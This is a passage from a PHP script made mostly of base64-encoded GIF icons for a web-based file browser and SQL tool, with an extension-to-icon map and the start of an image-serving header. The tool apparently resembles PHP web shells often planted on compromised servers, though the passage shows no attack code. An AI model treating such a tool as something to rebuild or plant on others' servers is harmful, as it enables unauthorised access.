"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJR3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", "search" => "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP///wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOaps5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsDAkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmrCbq7C6sIrqawrKwTv68iyA6rDhEAOw==", "setup" => "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJCQhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIBqCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQEOwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", "small_dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "small_unk" => "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1Up9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmPwr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMzaQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpMuSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQCyIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDjyAsokBkQADs=", "multipage" => "R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IRpJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", "sort_asc" => "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMaSLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", "sort_desc" => "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMbSLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", "sql_button_drop" => "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsAAAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/AQEAOw==", "sql_button_empty" => "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoAAAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", "sql_button_insert" => "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwAAAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", "up" => "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvVIXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", "write" => "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/zeEQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", "ext_asp" => "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD//////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgID6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", "ext_mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANUaGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fcIGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "ext_avi" => "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANMWFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4PYXCyg+V2i44XeRmSfYqsGhAAgA7", "ext_cgi" => "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/SEv/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQXv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UMBagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKDAkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAiRYtMAgEAOw==", "ext_cmd" => "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANIeLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCNdmrYAMn1onq/YKpjvEgAADs=", "ext_cpp" => "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANCWLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4RaEq7YrLDE7a4SADs=", "ext_ini" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANLaArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VMSnEjgPVarHEHgrB43JvszsQEADs=", "ext_diz" => "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZXpVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAAdAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocmC1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPFCyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAAOw==", "ext_doc" => "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANRWErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmqMIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", "ext_exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqtxhIAOw==", "ext_h" => "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANBWLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKoWq/NknbbSgAAOw==", "ext_hpp" => "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANFWLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVRUqUagnbLdZa+YFcCADs=", "ext_htaccess" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJAAA7", "ext_html" => "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNzc////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3PKIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDkBkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIRADs=", "ext_jpg" => "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEciCi8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftdFxEAOw==", "ext_js" => "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibHk0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhsa00AjYYBbc/o9HjNniUAADs=", "ext_lnk" => "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjONSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHziUww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABkAAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDGMymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQADs=", "ext_log" => "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wNzLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", "ext_php" => "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlgt0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", "ext_pl" => "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMoGLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", "ext_swf" => "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/OnAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GAGBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgCNysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", "ext_tar" => "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JICWv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XFHgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGDUyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17puo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkgGwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMdHUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FBu4tLAgEAOw==", "ext_txt" => "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJSArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7UpPWG3Ig6Hq/XmRjuZwkAAA7", "ext_wri" => "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoaoa4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", "ext_xml" => "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACAgDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICxOAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQIQA7" ); $imgequals = array( "ext_tar" => array( "ext_tar", "ext_r00", "ext_ace", "ext_arj", "ext_bz", "ext_bz2", "ext_tbz", "ext_tbz2", "ext_tgz", "ext_uu", "ext_xxe", "ext_zip", "ext_cab", "ext_gz", "ext_iso", "ext_lha", "ext_lzh", "ext_pbk", "ext_rar", "ext_uuf" ) , "ext_php" => array( "ext_php", "ext_php3", "ext_php4", "ext_php5", "ext_phtml", "ext_shtml", "ext_htm" ) , "ext_jpg" => array( "ext_jpg", "ext_gif", "ext_png", "ext_jpeg", "ext_jfif", "ext_jpe", "ext_bmp", "ext_ico", "ext_tif", "tiff" ) , "ext_html" => array( "ext_html", "ext_htm" ) , "ext_avi" => array( "ext_avi", "ext_mov", "ext_mvi", "ext_mpg", "ext_mpeg", "ext_wmv", "ext_rm" ) , "ext_lnk" => array( "ext_lnk", "ext_url" ) , "ext_ini" => array( "ext_ini", "ext_css", "ext_inf" ) , "ext_doc" => array( "ext_doc", "ext_dot" ) , "ext_js" => array( "ext_js", "ext_vbs" ) , "ext_cmd" => array( "ext_cmd", "ext_bat", "ext_pif" ) , "ext_wri" => array( "ext_wri", "ext_rtf" ) , "ext_swf" => array( "ext_swf", "ext_fla" ) , "ext_mp3" => array( "ext_mp3", "ext_au", "ext_midi", "ext_mid" ) , "ext_htaccess" => array( "ext_htaccess", "ext_htpasswd", "ext_ht", "ext_hta", "ext_so" ) ); if (!$getall) { header("Content-type: image/gif"); header("Cache-control: public"); 